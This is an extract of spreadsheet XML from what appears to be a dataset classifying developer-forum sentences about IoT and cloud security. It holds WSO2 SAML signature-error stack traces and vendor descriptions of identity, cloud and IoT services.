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oT Security Topics" sheetId="2" r:id="rId5"/>
  </sheets>
  <definedNames/>
  <calcPr/>
  <extLst>
    <ext uri="GoogleSheetsCustomDataVersion1">
      <go:sheetsCustomData xmlns:go="http://customooxmlschemas.google.com/" r:id="rId6" roundtripDataSignature="AMtx7mgZkmLeqn8KqzWIVemsWcLTzZw6lA=="/>
    </ext>
  </extLst>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="68576" uniqueCount="32998">
  <si>
    <t>PostId</t>
  </si>
  <si>
    <t>sentence</t>
  </si>
  <si>
    <t>roBERTa</t>
  </si>
  <si>
    <t>Topics</t>
  </si>
  <si>
    <t>Correlation Score</t>
  </si>
  <si>
    <t>while installing Android Catalyst app from wso2 IoT 3.2.0 store application getting below error :
[IoT-Core] ERROR - {org.jaggeryjs.modules.sso.common.util.Util} Error while validating signature
org.opensaml.xml.validation.ValidationException: Unable to evaluate key against signature
        at org.opensaml.xml.signature.SignatureValidator.validate(SignatureValidator.java:74)
        at org.jaggeryjs.modules.sso.common.util.Util.validateSignature(Util.java:404)
        at org.jaggeryjs.modules.sso.common.util.Util.validateSignature(Util.java:327)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at org.mozilla.javascript.MemberBox.invoke(MemberBox.java:126)
        at org.mozilla.javascript.NativeJavaMethod.call(NativeJavaMethod.java:225)
        at org.mozilla.javascript.optimizer.OptRuntime.callN(OptRuntime.java:52)
        at org.jaggeryjs.rhino..scripts.c0._c_anonymous_3(/scripts/sso.client.js:64)
        at org.jaggeryjs.rhino..scripts.c0.call(/scripts/sso.client.js)
        at org.mozilla.javascript.optimizer.OptRuntime.call2(OptRuntime.java:42)
        at org.jaggeryjs.rhino..scripts.c0._c_anonymous_15(/scripts/sso.client.js:253)
        at org.jaggeryjs.rhino..scripts.c0.call(/scripts/sso.client.js)
        at org.mozilla.javascript.optimizer.OptRuntime.callN(OptRuntime.java:52)
        at org.jaggeryjs.rhino.social.controllers.c2._c_anonymous_1(/social/controllers/acs.jag:77)
        at org.jaggeryjs.rhino.social.controllers.c2.call(/social/controllers/acs.jag)
        at org.mozilla.javascript.optimizer.OptRuntime.call0(OptRuntime.java:23)
        at org.jaggeryjs.rhino.social.controllers.c2._c_script_0(/social/controllers/acs.jag:20)
        at org.jaggeryjs.rhino.social.controllers.c2.call(/social/controllers/acs.jag)
        at org.mozilla.javascript.ContextFactory.doTopCall(ContextFactory.java:394)
        at org.mozilla.javascript.ScriptRuntime.doTopCall(ScriptRuntime.java:3091)
        at org.jaggeryjs.rhino.social.controllers.c2.call(/social/controllers/acs.jag)
        at org.jaggeryjs.rhino.social.controllers.c2.exec(/social/controllers/acs.jag)
        at org.jaggeryjs.scriptengine.engine.RhinoEngine.execScript(RhinoEngine.java:567)
        at org.jaggeryjs.scriptengine.engine.RhinoEngine.exec(RhinoEngine.java:273)
        at org.jaggeryjs.jaggery.core.manager.WebAppManager.exec(WebAppManager.java:588)
        at org.jaggeryjs.jaggery.core.manager.WebAppManager.execute(WebAppManager.java:508)
        at org.jaggeryjs.jaggery.core.JaggeryServlet.doPost(JaggeryServlet.java:29)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org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:743)
        at org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:485)
        at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:377)
        at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:337)
        at org.jaggeryjs.jaggery.core.JaggeryFilter.doFilter(JaggeryFilter.java:21)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)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org.owasp.csrfguard.CsrfGuardFilter.doFilter(CsrfGuardFilter.java:88)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
        at org.wso2.carbon.ui.filters.cache.ContentTypeBasedCachePreventionFilter.doFilter(ContentTypeBasedCachePreventionFilter.java:53)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:218)
        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:506)
        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
        at org.wso2.carbon.tomcat.ext.valves.CompositeValve.continueInvocation(CompositeValve.java:99)
        at org.wso2.carbon.tomcat.ext.valves.CarbonTomcatValve$1.invoke(CarbonTomcatValve.java:47)
        at org.wso2.carbon.webapp.mgt.TenantLazyLoaderValve.invoke(TenantLazyLoaderValve.java:57)
        at org.wso2.carbon.webapp.authenticator.framework.WebappAuthenticationValve.invoke(WebappAuthenticationValve.java:46)
        at org.wso2.carbon.tomcat.ext.valves.TomcatValveContainer.invokeValves(TomcatValveContainer.java:47)
        at org.wso2.carbon.tomcat.ext.valves.CompositeValve.invoke(CompositeValve.java:62)
        at org.wso2.carbon.tomcat.ext.valves.CarbonStuckThreadDetectionValve.invoke(CarbonStuckThreadDetectionValve.java:159)
        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:962)
        at org.wso2.carbon.tomcat.ext.valves.CarbonContextCreatorValve.invoke(CarbonContextCreatorValve.java:57)
        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:445)
        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1115)
        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637)
        at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1770)
        at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.run(NioEndpoint.java:1729)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
        at java.lang.Thread.run(Thread.java:748)
Caused by: org.apache.xml.security.signature.XMLSignatureException: Signature length not correct: got 128 but was expecting 512
Original Exception was java.security.SignatureException: Signature length not correct: got 128 but was expecting 512
        at org.apache.xml.security.algorithms.implementations.SignatureBaseRSA.engineVerify(SignatureBaseRSA.java:93)
        at org.apache.xml.security.algorithms.SignatureAlgorithm.verify(SignatureAlgorithm.java:301)
        at org.apache.xml.security.signature.XMLSignature.checkSignatureValue(XMLSignature.java:723)
        at org.opensaml.xml.signature.SignatureValidator.validate(SignatureValidator.java:69)</t>
  </si>
  <si>
    <t>Secure Digital Signature</t>
  </si>
  <si>
    <t>-fstack-protector-strong -Wformat -Werror=format-security -U_FORTIFY_SOURCE -D_FORTIFY_SO
URCE=1
Linking: gcc   -Wl,-z,relro -Wl,-z,now -Wl,--as-needed -o vim        -lm -ltinfo -lnsl  -lselinux -lacl -lattr -lgpm -ldl
Output of :scriptnames
1: /usr/share/vim/vim80/defaults.vim
  2: /usr/share/vim/vim80/syntax/syntax.vim
  3: /usr/share/vim/vim80/syntax/synload.vim
  4: /usr/share/vim/vim80/syntax/syncolor.vim
  5: /usr/share/vim/vim80/filetype.vim
  6: /usr/share/vim/vim80/plugin/getscriptPlugin.vim
  7: /usr/share/vim/vim80/plugin/gzip.vim
  8: /usr/share/vim/vim80/plugin/logiPat.vim
  9: /usr/share/vim/vim80/plugin/manpager.vim
 10: /usr/share/vim/vim80/plugin/matchparen.vim
 11: /usr/share/vim/vim80/plugin/netrwPlugin.vim
 12: /usr/share/vim/vim80/plugin/rrhelper.vim
 13: /usr/share/vim/vim80/plugin/spellfile.vim
 14: /usr/share/vim/vim80/plugin/tarPlugin.vim
 15: /usr/share/vim/vim80/plugin/tohtml.vim
 16: /usr/share/vim/vim80/plugin/vimballPlugin.vim
 17: /usr/share/vim/vim80/plugin/zipPlugin.vim
 18: /usr/share/vim/vim80/syntax/vim.vim</t>
  </si>
  <si>
    <t>Service categories 
Compute:    Obtain access to bare metal and virtual servers
Storage:    Store unstructured data in the cloud
Network:    Secure VPN connections, orchestrate load balancing, and use other network services
Security:   Configure firewalls and secure connections
Containers: Deploy Kubernetes clusters and use Docker-based containers
VMware:     Integrate VMware solutions
Boilerplates: Use templates to help you get started with various services
APIs: Create, manage, enforce, and run APIs
Application Services: Deliver applications that include business rules, automation, an application server, and more
Blockchain: Integrate the IBM Blockchain technology in your environment
Cloud Foundry Apps: Choose from multiple runtimes including Liberty for Java, SDK for Node.js, and Swift
Data &amp; Analytics: Select from a variety of database options, including Compose, and incorporate big data analytics
DevOps: Go from application development to deployment with continuous delivery, auto-scaling, globalization, and alert notifications
Finance: Manage your investments and finances
Functions: Execute serverless event-driven programming (IBM Cloud Functions)
Integrate: Access API management, product insights, secure gateway functionality
Internet of Things: Manage connected devices using IoT foundation and IoT for electronics
Mobile: Integrate push notifications, testing, tuning, and analytics for mobile applications
Watson: Add cognitive abilities to applications
When asking questions about the IBM Cloud platform, you should:
Ensure you are asking a technical question about using the IBM Cloud platform or services.</t>
  </si>
  <si>
    <t>Login Error
And I get errors in the server logs;
[2019-03-28 11:33:56,089] [IoT-Core] ERROR -
  {org.jaggeryjs.modules.sso.common.util.Util} Error while validating
  signature org.opensaml.xml.validation.ValidationException: Signature
  did not validate against the credential's key     at
  org.opensaml.xml.signature.SignatureValidator.validate(SignatureValidator.java:79)
    at
  org.jaggeryjs.modules.sso.common.util.Util.validateSignature(Util.java:461)
    at
  org.jaggeryjs.modules.sso.common.util.Util.validateSignature(Util.java:384)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)  at
  sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at
  sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:498)     at
  org.mozilla.javascript.MemberBox.invoke(MemberBox.java:126)   at
  org.mozilla.javascript.NativeJavaMethod.call(NativeJavaMethod.java:225)
    at
  org.mozilla.javascript.optimizer.OptRuntime.callN(OptRuntime.java:52)
    at
  org.jaggeryjs.rhino..scripts.c0._c_anonymous_3(/scripts/sso.client.js:64)
    at
  org.jaggeryjs.rhino..scripts.c0.call(/scripts/sso.client.js)
    at
  org.mozilla.javascript.optimizer.OptRuntime.call2(OptRuntime.java:42)
    at
  org.jaggeryjs.rhino.devicemgt.lib.modules.auth.c0._c_anonymous_20(/devicemgt/lib/modules/auth/auth.js:532)
    at
  org.jaggeryjs.rhino.devicemgt.lib.modules.auth.c0.call(/devicemgt/lib/modules/auth/auth.js)
    at
  org.mozilla.javascript.optimizer.OptRuntime.call2(OptRuntime.java:42)
    at
  org.jaggeryjs.rhino.devicemgt.lib.modules.auth.c2._c_anonymous_1(/devicemgt/lib/modules/auth/acs.jag:34)
    at
  org.jaggeryjs.rhino.devicemgt.lib.modules.auth.c2.call(/devicemgt/lib/modules/auth/acs.jag)
    at
  org.mozilla.javascript.optimizer.OptRuntime.call0(OptRuntime.java:23)
    at
  org.jaggeryjs.rhino.devicemgt.lib.modules.auth.c2._c_script_0(/devicemgt/lib/modules/auth/acs.jag:22)
    at
  org.jaggeryjs.rhino.devicemgt.lib.modules.auth.c2.call(/devicemgt/lib/modules/auth/acs.jag)
    at
  org.mozilla.javascript.ContextFactory.doTopCall(ContextFactory.java:394)
    at
  org.mozilla.javascript.ScriptRuntime.doTopCall(ScriptRuntime.java:3091)
    at
  org.jaggeryjs.rhino.devicemgt.lib.modules.auth.c2.call(/devicemgt/lib/modules/auth/acs.jag)
    at
  org.jaggeryjs.rhino.devicemgt.lib.modules.auth.c2.exec(/devicemgt/lib/modules/auth/acs.jag)
    at
  org.jaggeryjs.scriptengine.engine.RhinoEngine.execScript(RhinoEngine.java:567)
    at
  org.jaggeryjs.scriptengine.engine.RhinoEngine.exec(RhinoEngine.java:273)
    at
  org.jaggeryjs.jaggery.core.manager.WebAppManager.exec(WebAppManager.java:588)
    at
  org.jaggeryjs.jaggery.core.manager.WebAppManager.execute(WebAppManager.java:508)
    at
  org.jaggeryjs.jaggery.core.JaggeryServlet.doPost(JaggeryServlet.java:29)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org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:743)
    at
  org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:485)
    at
  org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:377)
    at
  org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:337)
    at
  org.jaggeryjs.jaggery.core.JaggeryFilter.doFilter(JaggeryFilter.java:21)
    at
  org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)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org.wso2.carbon.ui.filters.cache.ContentTypeBasedCachePreventionFilter.doFilter(ContentTypeBasedCachePreventionFilter.java:53)
    at
  org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
    at
  org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at
  org.owasp.csrfguard.CsrfGuardFilter.doFilter(CsrfGuardFilter.java:88)
    at
  org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
    at
  org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at
  org.apache.catalina.filters.HttpHeaderSecurityFilter.doFilter(HttpHeaderSecurityFilter.java:124)
    at
  org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
    at
  org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
    at
  org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
    at
  org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
    at
  org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:498)
    at
  org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
    at
  org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
    at
  org.wso2.carbon.tomcat.ext.valves.CompositeValve.continueInvocation(CompositeValve.java:99)
    at
  org.wso2.carbon.tomcat.ext.valves.CarbonTomcatValve$1.invoke(CarbonTomcatValve.java:47)
    at
  org.wso2.carbon.webapp.mgt.TenantLazyLoaderValve.invoke(TenantLazyLoaderValve.java:57)
    at
  org.wso2.carbon.webapp.authenticator.framework.WebappAuthenticationValve.invoke(WebappAuthenticationValve.java:46)
    at
  org.wso2.carbon.tomcat.ext.valves.TomcatValveContainer.invokeValves(TomcatValveContainer.java:47)
    at
  org.wso2.carbon.tomcat.ext.valves.CompositeValve.invoke(CompositeValve.java:62)
    at
  org.wso2.carbon.tomcat.ext.valves.CarbonStuckThreadDetectionValve.invoke(CarbonStuckThreadDetectionValve.java:159)
    at
  org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:962)
    at
  org.wso2.carbon.tomcat.ext.valves.CarbonContextCreatorValve.invoke(CarbonContextCreatorValve.java:57)
    at
  org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
    at
  org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:445)
    at
  org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1115)
    at
  org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637)
    at
  org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1775)
    at
  org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.run(NioEndpoint.java:1734)
    at
  java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at
  java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at
  org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:748) [2019-03-28 11:33:56,091]
  [IoT-Core] ERROR - {auth-module} Invalid signature found in the SAML
  response.</t>
  </si>
  <si>
    <t>WSO2 Identity Server enables enterprise architects and developers to improve customer experience by reducing identity provisioning time, guaranteeing secure online interactions, and delivering a reduced single sign-on environment.</t>
  </si>
  <si>
    <t>Analogy: Just like in an apartment buildingin which many tenants cost-efficiently share the common infrastructure of the building but have walls and doors that give them privacy from other tenantsa cloud uses multitenancy technology to share IT resources securely among multiple applications and tenants (businesses, organizations, etc.)</t>
  </si>
  <si>
    <t>Boto supports the following services:
Compute
Amazon Elastic Compute Cloud (EC2)
Amazon Elastic Map Reduce (EMR)
AutoScaling
Elastic Load Balancing (ELB)
Content Delivery
Amazon CloudFront
Database
Amazon Relational Data Service (RDS)
Amazon DynamoDB
Amazon SimpleDB
Deployment and Management
AWS Identity and Access Management (IAM)
Amazon CloudWatch
AWS Elastic Beanstalk
AWS CloudFormation
Application Services
Amazon CloudSearch
Amazon Simple Workflow Service (SWF)
Amazon Simple Queue Service (SQS)
Amazon Simple Notification Server (SNS)
Amazon Simple Email Service (SES)
Networking
Amazon Route53
Amazon Virtual Private Cloud (VPC)
Payments and Billing
Amazon Flexible Payment Service (FPS)
Storage
Amazon Simple Storage Service (S3)
Amazon Glacier
Amazon Elastic Block Store (EBS)
Google Cloud Storage
Workforce
Amazon Mechanical Turk
Other
Marketplace Web Services</t>
  </si>
  <si>
    <t>It features support for OpenID 1.1 and 2.0 Relying Parties and Providers, OAuth 1.0 &amp; 1.1 Consumers and Service Providers, OAuth 2.0 Clients, Resource Servers and Authorization Servers, and Information Card relying parties.</t>
  </si>
  <si>
    <t>Questions about the usage of APIs and webservices exposed by the iTunes Store, Apple's online music &amp; media store (not to be confused with the App Store, their online store for mobile applications).</t>
  </si>
  <si>
    <t>Decentralized identity, also known as Self-Sovereign Identity is a digital identity that is fully under the control of the identity subject,  independent from any centralized registry, identity provider, or certificate authority.</t>
  </si>
  <si>
    <t>Cloud Memorystore for Redis provides a fully managed in-memory data store service built on scalable, secure, and highly available infrastructure managed by Google.</t>
  </si>
  <si>
    <t>Support
Mobile Platforms: Objective-C, Swift, Java, Xamarin, React Native
Lifecycle Features: Build, Test, Crash, Beta Distribution, Analytics
Cloud Features: Authentication, Easy Tables, Offline Sync
We're just getting started and have big plans for helping you deliver better mobile apps faster, with support for Cordova and UWP apps and more lifecycle and mobile cloud services in the near future.</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">The Mobile SDK integrates with the Force.com cloud architecture by providing:
SmartSync Data Framework for accessing Salesforce data through JavaScript
Secure offline storage
Data syncing for hybrid apps
Implementation of Force.com Connected App policy that works out of the box
OAuth credentials management, including persistence and refresh capabilities
Wrappers for Salesforce REST APIs
Libraries for building native iOS and Android applications
Containers for building hybrid applications
Source: </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://developer.salesforce.com/docs/atlas.en-us.mobile_sdk.meta/mobile_sdk/intro.htm</t>
    </r>
  </si>
  <si>
    <t>etcd is a highly-available key value store for shared configuration and service discovery, inspired by Apache ZooKeeper and doozer, with a focus on being:
Simple: curl'able user facing API (HTTP+JSON)
Secure: optional SSL client cert authentication
Fast: benchmarked 1000s of writes/s per instance
Reliable: properly distributed using Raft
etcd is written in Go and uses the Raft consensus algorithm to manage a highly-available replicated log.</t>
  </si>
  <si>
    <t>Google Cloud IoT Core is a fully managed service to easily and securely connect, manage, and ingest data from globally dispersed devices.</t>
  </si>
  <si>
    <t>Users can install apps published by their company only after they enroll their phones for app distribution from their company, and only users that are enrolled for app distribution from the company can install the company apps.</t>
  </si>
  <si>
    <t>Ping Identity delivers single sign-on and identity management, increasing IT security and providing secure mobile access to the Cloud as well as enterprise</t>
  </si>
  <si>
    <t>Now if you want to leverage an IoT Cloud to manage devices, easily secure and authenticate them, upload telemetry to the Cloud at a high throughput and take advantage of advanced analytics services in the Cloud (Big Data, Machine Learning,...), then Azure IoT Hub is for you.</t>
  </si>
  <si>
    <t>Major tunneling protocols (ie: Layer 2 Tunneling Protocol (L2TP), Point to Point Tunneling Protocol (PPTP), and Layer 2 Forwarding (L2F)) encapsulate Layer 2 traffic from the remote user and send it across the public network to the far end of the tunnel where it is de-encapsulated and sent to its destination.</t>
  </si>
  <si>
    <t>As an undisputed leader of service and application delivery, Citrix NetScaler solutions are deployed in thousands of networks around the globe to optimize, secure and control the delivery of all enterprise and cloud services.</t>
  </si>
  <si>
    <t>The main difference between intrusive containers and non-intrusive containers is that in C++ non-intrusive containers store copies of values passed by the user (an intrusive container stores the objects themselves).</t>
  </si>
  <si>
    <t>MCS enables companies to create and deploy scalable, robust, and secure mobile applications quickly and easily, and empowers developers to leverage enterprise IT systemswithout having to get IT involved.</t>
  </si>
  <si>
    <t>Azure IoT Hub is a fully managed Microsoft service that enables reliable and secure bi-directional communications between millions of IoT devices and a solution backend.</t>
  </si>
  <si>
    <t>Amazon Zocalo is a fully managed, secure enterprise storage and sharing service with strong administrative controls and feedback capabilities that improve user productivity.</t>
  </si>
  <si>
    <t>Microsoft Azure Active Directory (Microsoft Azure AD) is a modern developer platform and IAM service that provides identity management and access control capabilities for your cloud applications.</t>
  </si>
  <si>
    <t>From the AWS product page:
AWS Certificate Manager is a service that lets you easily provision,
  manage, and deploy Secure Sockets Layer/Transport Layer Security
  (SSL/TLS) certificates for use with AWS services.</t>
  </si>
  <si>
    <t>Red Hat AMQ can be deployed, and easily managed, in any configuration so you can deploy a network of brokers across your infrastructure whether they are on premise, in the Cloud, or in a hybrid configuration.</t>
  </si>
  <si>
    <t>Red Hat AMQ can be deployed and easily managed in any configuration so you can deploy a network of brokers across your infrastructure whether they are on premise, in the Cloud, or in a hybrid configuration.</t>
  </si>
  <si>
    <t>SaaS vendor with flagship products offering solutions for social sign-in and registration (via OpenID and OAuth providers), user profile management, and single sign-on.Janrain specializes in customer identity data management and social login systems</t>
  </si>
  <si>
    <t>Android for Work is an enterprise mobility management (EMM) platform that lets companies deliver a secure, productive, and rich mobile experience to their employees.</t>
  </si>
  <si>
    <t>EMC Atmos is the Cloud storage platform that enables enterprises and service providers to store, manage, and protect globally distributed, big data at scale.</t>
  </si>
  <si>
    <t>Provide delegated and role-based administration; easily secure and manage data flowing to your mobile apps; and protect your assets with built-in backup and restore capability.</t>
  </si>
  <si>
    <t>You can use the BlackBerry Dynamics SDK to develop apps for all major platforms that leverage valuable services, including secure communications, interapp data exchange, presence, push, directory lookup, single sign-on authentication, and identity and access management.</t>
  </si>
  <si>
    <t>The on-premises data gateway acts as a bridge, providing quick and secure data transfer between on-premises data (data that is not in the cloud) and several Microsoft cloud services, including Power BI, PowerApps, Microsoft Flow, Azure Analysis Services, and Logic Apps.</t>
  </si>
  <si>
    <t>Manage message delivery in the cloud
Queues offer simple first in, first out guaranteed message delivery and supports a range of standard protocols (REST, AMQP, WS*) and APIs.</t>
  </si>
  <si>
    <t>In terms of the Store experience, customers will benefit from an app identity shared across the Windows Store and the Windows Phone Store.</t>
  </si>
  <si>
    <t>Using Microsoft Store: The app is published and updated from the Microsoft Store.Please note that the Microsoft Store Client is not supported in Windows 10 IoT Core,so it can not update app by using Microsoft Store Client like on Windows Desktop.In this option, the apps that is pre-packaged needs to be Microsoft Store compliant apps (store signed), and need to put to store.</t>
  </si>
  <si>
    <t>AWS Certificate Manager(amazon-acm) is a service that lets you easily provision, manage, and deploy Secure Sockets Layer/Transport Layer Security (SSL/TLS) certificates for use with AWS services</t>
  </si>
  <si>
    <t>AWS Certificate Manager is a service that lets you easily provision, manage, and deploy Secure Sockets Layer/Transport Layer Security (SSL/TLS) certificates for use with AWS services.</t>
  </si>
  <si>
    <t>Pitney Bowes Developer API Portfolio includes
Commerce technology APIs
Location Intelligence APIs
Shipping APIs
Identify APIs
Payments APIs
This also includes all the solutions listed in https://www.pitneybowes.com/us/developer.html</t>
  </si>
  <si>
    <t>Auth0 is a cloud or on-premises authentication and authorization service provider that lets you easily and quickly connect your apps, choose identity providers, add users, set up rules, customize your login page and access analytics from within your Auth0 dashboard.</t>
  </si>
  <si>
    <t>It gives any developer access to the same highly scalable, reliable, secure, fast, inexpensive infrastructure that Amazon uses to run its own global network of web sites.</t>
  </si>
  <si>
    <t>In computer networking, Layer 2 Tunneling Protocol (L2TP) is a tunneling protocol used to support virtual private networks (VPNs) or as part of the delivery of services by ISPs.</t>
  </si>
  <si>
    <t>Of course, the alternative could be to use Service Fabric Reliable actors (potentially with service mesh once it becomes available) , but I would like to keep the solution as simple as possitve, hence why my focus on Functions.</t>
  </si>
  <si>
    <t>OpenIDM is a User Administration and Provisioning solution designed to manage user accounts, profile information, and access requests for customers, partners, devices, and employees, on premises and across cloud and mobile environments.</t>
  </si>
  <si>
    <t>Finally, in contrast to Libra which provides a libOS abstraction for the JVM over Xen
but relies on a separate Linux VM instance to provide networking
and storage, unikernels are more highly-specialised single-purpose
appliance VMs that directly integrate communication protocols.</t>
  </si>
  <si>
    <t>Docker Enterprise Edition Platform 2.0 (Docker EE) is a Containers-as-a-Service (CaaS) platform that enables a secure software supply chain and deploys diverse applications for high availability across disparate infrastructure, both on-premises and in the cloud.</t>
  </si>
  <si>
    <t>6- Web: Secured, cost effective, and highly scalable data platform for public web sitesavailable to third-party hosting service providers only.</t>
  </si>
  <si>
    <t>MSDN Documentation
Managing Authorization Using Roles
Understanding Role Management
Role Management Providers
ASP.NET Security
Questions for this Tag
Questions that should have this tag pertain to use of the default ASP.NET Role Providers (AspNetSqlRoleProvider &amp; AspNetWindowsTokenRoleProvider), as well as questions about extending/overriding the built-in provider.</t>
  </si>
  <si>
    <t>Features
Some of the biggest features of LXD are:
Secure by design (unprivileged containers, resource restrictions and much more)
Scalable (from containers on your laptop to thousand of compute nodes)
Intuitive (simple, clear API and crisp command line experience)
Image based (no more distribution templates, only good, trusted images)
Live migration
Relationship with LXC
LXD isn't a rewrite of LXC, in fact it's building on top of LXC to provide a new, 
better user experience.</t>
  </si>
  <si>
    <t>If you must own the infrastructure that the files are shared on you could use CIFS/SMB on a Raspberry Pi and set up a file share secured based on user accounts, either just one for the app or one per user which they would use to sign into the app.</t>
  </si>
  <si>
    <t>Service developers also create connector APIs to connect to enterprise systems, which may involve mapping users and roles from the MBaaS to other authentication and authorization schemes used by the enterprise systems they connect to.</t>
  </si>
  <si>
    <t>SimpleSAMLphp can be used to implement an identity Provider (IdP) to supply user information to authenticated services, a service provider (SP) to protect resources and offer an authentication interface or as a bridge to translate between popular identity protocols, such as: Shibboleth 1.3, A-Select, CAS, OpenID, WS-Federation and OAuth.</t>
  </si>
  <si>
    <t>Active Directory Federation Services (AD FS)3.0 service in Windows 2012 R2 provides simplified, secured claims based identity federation and Web single sign-on (SSO) capabilities for end users who want to access applications within an AD FS-secured enterprise, in federation partner organizations, or in the cloud.</t>
  </si>
  <si>
    <t>Active Directory Federation Services (AD FS) 4.0 service in Windows 2016 provides simplified, secured claims based identity federation and Web single sign-on (SSO) capabilities for end users who want to access applications within an AD FS-secured enterprise, in federation partner organizations, or in the cloud.</t>
  </si>
  <si>
    <t>Shared identity means that if they purchase your app from the Windows Store, they are capable of installing it on a device from the Windows Phone Store using the same Microsoft account without having to purchase the app again.</t>
  </si>
  <si>
    <t>OVH is an Internet Service Provider providing dedicated servers, shared and cloud hosting, domain registration, and VOIP telephony services.</t>
  </si>
  <si>
    <t>AllJoyn manages the difficult connectivity, networking and security requirements of P2P communications and allows developers to focus on delivering new and exciting user experiences.</t>
  </si>
  <si>
    <t>Microsoft Azure Service Bus provides a hosted, secure, and widely available infrastructure for widespread communication, large-scale event distribution, naming, and service publishing.</t>
  </si>
  <si>
    <t>It supports multiple types of authentication across any application platform:
Social - authenticate users with social providers (Facebook, Twitter, etc).</t>
  </si>
  <si>
    <t>AWS CodeCommit is a fully-managed source control service that makes it easy for companies to host secure and highly scalable private Git repositories.</t>
  </si>
  <si>
    <t>Unified Payments Interface (UPI) is a payment system launched by National Payments Corporation of India and regulated by Reserve Bank of India which facilitates the fund transfer between two bank accounts on the mobile platform instantly
UPI (Unified Payments Interface) is an advanced version of Immediate Payment Service(IMPS) platform designed for transferring funds using: Transfer through Virtual Payment Address (Unique ID provided by bank) or Account Number + IFSC or Mobile Number + MMID(Mobile Money Identifier) or Aadhaar Number or Collect / Pull money basis Virtual ID.</t>
  </si>
  <si>
    <t>Apps have expanded scaling head-room with new compute resources and gain secure, direct access over virtual networks to corporate resources connected via Site-to-Site or ExpressRoute connections.</t>
  </si>
  <si>
    <t>Allows for the implementation of single sign-on and access control for modern web applications and APIs using protocols such as OpenID Connect and OAuth2.</t>
  </si>
  <si>
    <t>Under this tag questions can be asked about:
Scopes and permissions 
Representational State Transfer (REST) API 
JavaScript API (Windows Store app and web)
Managed API (Windows Store app and Windows Phone) 
iOS interface 
Packages for  Android apps
OneDrive Pickers
